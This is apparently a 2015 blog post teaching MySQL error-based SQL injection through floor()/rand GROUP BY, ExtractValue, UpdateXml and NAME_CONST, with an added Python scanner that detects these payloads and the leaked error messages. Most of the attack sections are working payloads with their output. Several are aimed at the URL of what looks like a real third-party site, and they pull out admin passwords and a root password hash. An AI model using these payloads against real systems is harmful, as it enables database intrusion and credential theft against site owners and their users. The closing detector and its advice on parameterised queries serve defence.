MySQL floor(), ExtractValue and UpdateXml: three error-based injection techniques and how they are used

Posted on 2015-11-11 19:03:37

1. Error via floor()

The following payloads can be used:

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union   select null union   select  !1)x group by concat((select table_name from information_schema.tables  limit 1),floor(rand(0)*2)));

Example:
First, a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+

If the id parameter is injectable, the following statement triggers the error:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

As you can see, the MySQL version was leaked successfully. To retrieve other data, replace the version() expression with the subquery you need.
For example, to retrieve the administrator's username and password:

Method1:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id=1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Method2:

mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

2. ExtractValue
Test statement:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

Actual test:

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));
ERROR 1105 (HY000): XPATH syntax error: '\admin888'

3. UpdateXml

Test statement:

and 1=(updatexml(1,concat(0x3a,(select user())),1))

Actual test:

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x3a,(select user())),1));
ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'

More collected examples:

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)

Error: Duplicate column name '5.0.27-community-nt'

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)

Error: Duplicate column name 'root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
Error-based injection on newer MySQL versions: injecting with NAME_CONST
It's been a while since I've made an SQL Injection tutorial, so I thought I should make a new tutorial using the method name_const. There aren't many papers documenting this method, so it feels kind of good to be the one to make a guide for it.

Background

NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.

Code:
NAME_CONST(DATA, VALUE)

Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.

SELECT NAME_CONST('TEST', 1)

+------+
| TEST |
+------+
|    1 |
+------+

http://dev.mysql.com/doc/refman/5.0/en/m...name-const
Intro to MySQL Variables

Once you've got your vulnerable site, let's try getting some MySQL system variables using NAME_CONST.

Code:
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261

Code:
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--

VAR = Your MySQL variable.

MySQL 5.1.3 Server System Variables

Let's try it out on my site..

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--

Error: Duplicate column name '5.0.27-community-nt'

Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, it just wouldn't work there. Luckily, they work here, so let's get this going again...

Data Extraction

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--

We should get a duplicate column 1 error...

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--

Error: Duplicate column name '1'

Now let's get the tables out of this bitch..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Let's see if it works here; if it does, we can go on and finish the job.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Error: Duplicate column name 'com_admanage'
Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.

Let's get the columns out of the user table..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this, and I get the duplicate column name 'Host'.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--

Error: Duplicate column name 'Host'
Woot, time to finish this bitch off.

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this...

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--

Error: Duplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
And there we have it, thanks for reading.
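The post above shows four error-based oracles (floor()/rand(0) with GROUP BY, ExtractValue, UpdateXml, and the NAME_CONST duplicate-column trick) and, for each, the raw MySQL error text that leaks the data. As an added example that is not part of the original post or of any tool it mentions, here is a small Python scanner for the defender's side of that exchange: it flags request query strings that carry these payload shapes and response bodies that contain the server's verbose error. The sample records, the `5.x.y-placeholder` version strings and the `placeholder@localhost` account are constructed for this example; the three error-message formats are the ones quoted in the post.

```python
"""Added example (not from the original post): flag the error-based MySQL
injection patterns described above in request/response records.

Request side: payload shapes (floor(rand(0)*2) + GROUP BY, extractvalue/updatexml
with concat, two NAME_CONST calls in one select list).
Response side: the verbose MySQL errors that make these oracles work.
"""
import re
from typing import Iterable, List, Tuple
from urllib.parse import unquote_plus

# Regexes over the decoded, lower-cased query string.
REQUEST_SIGNATURES = {
    # floor(rand(0)*2) used as a GROUP BY key -> "Duplicate entry ... group_key"
    "floor_rand_groupby": re.compile(
        r"floor\s*\(\s*rand\s*\(\s*0?\s*\)\s*\*\s*2\s*\).*group\s+by", re.S),
    # extractvalue()/updatexml() fed a concat() so the XPath error echoes data
    "extractvalue_concat": re.compile(r"extractvalue\s*\(.*concat\s*\(", re.S),
    "updatexml_concat": re.compile(r"updatexml\s*\(.*concat\s*\(", re.S),
    # two name_const() calls in one select list -> "Duplicate column name"
    "name_const_duplicate": re.compile(r"name_const\s*\(.*name_const\s*\(", re.S),
}

# Regexes over the raw response body (MySQL error text reaching the client).
RESPONSE_SIGNATURES = {
    "duplicate_entry_group_key": re.compile(
        r"Duplicate entry '.*' for key 'group_key'"),
    "xpath_syntax_error": re.compile(r"XPATH syntax error: '.*'"),
    "duplicate_column_name": re.compile(r"Duplicate column name '.*'"),
}


def normalise(raw_query: str) -> str:
    """Decode %xx escapes and '+' (the post's payloads use '+' for spaces), lower-case."""
    return unquote_plus(raw_query).lower()


def scan_request(raw_query: str) -> List[str]:
    """Return the names of all request-side signatures that match the query string."""
    q = normalise(raw_query)
    return [name for name, rx in REQUEST_SIGNATURES.items() if rx.search(q)]


def scan_response(body: str) -> List[str]:
    """Return the names of all leaked-error fingerprints found in a response body."""
    return [name for name, rx in RESPONSE_SIGNATURES.items() if rx.search(body)]


def scan_records(records: Iterable[Tuple[str, str]]) -> List[Tuple[int, List[str], List[str]]]:
    """records: (request_query, response_body) pairs.
    Returns (index, request_hits, response_hits) for every record with a hit."""
    findings = []
    for i, (query, body) in enumerate(records):
        req_hits = scan_request(query)
        resp_hits = scan_response(body)
        if req_hits or resp_hits:
            findings.append((i, req_hits, resp_hits))
    return findings


# Constructed sample traffic; version strings and account names are placeholders.
SAMPLE_RECORDS = [
    ("id=1", "<html>article 1</html>"),
    ("id=1+and+(select+1+from+(select+count(*),concat(version(),floor(rand(0)*2))x"
     "+from+information_schema.tables+group+by+x)a)",
     "ERROR 1062 (23000): Duplicate entry '5.x.y-placeholder1' for key 'group_key'"),
    ("id=1+and+extractvalue(1,concat(0x5c,(select+user())))",
     "ERROR 1105 (HY000): XPATH syntax error: '\\placeholder@localhost'"),
    ("id=1+and+1=(select+*+from+(select+NAME_CONST(version(),1),"
     "NAME_CONST(version(),1))+as+x)--",
     "Error: Duplicate column name '5.x.y-placeholder'"),
    ("id=2&sort=title", "<html>article 2</html>"),
]

if __name__ == "__main__":
    for idx, req, resp in scan_records(SAMPLE_RECORDS):
        print(f"record {idx}: request={req} response={resp}")
```

The request-side patterns work regardless of `+` versus `%20` encoding because the query string is decoded first. The response-side patterns are the stronger signal: a `Duplicate entry ... for key 'group_key'`, `XPATH syntax error` or `Duplicate column name` string reaching a client means the application is returning raw database errors, which is exactly the channel every technique in the post depends on. Matching on these is a detection aid only; the fix is parameterised queries plus a generic error page so the database message never reaches the user.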
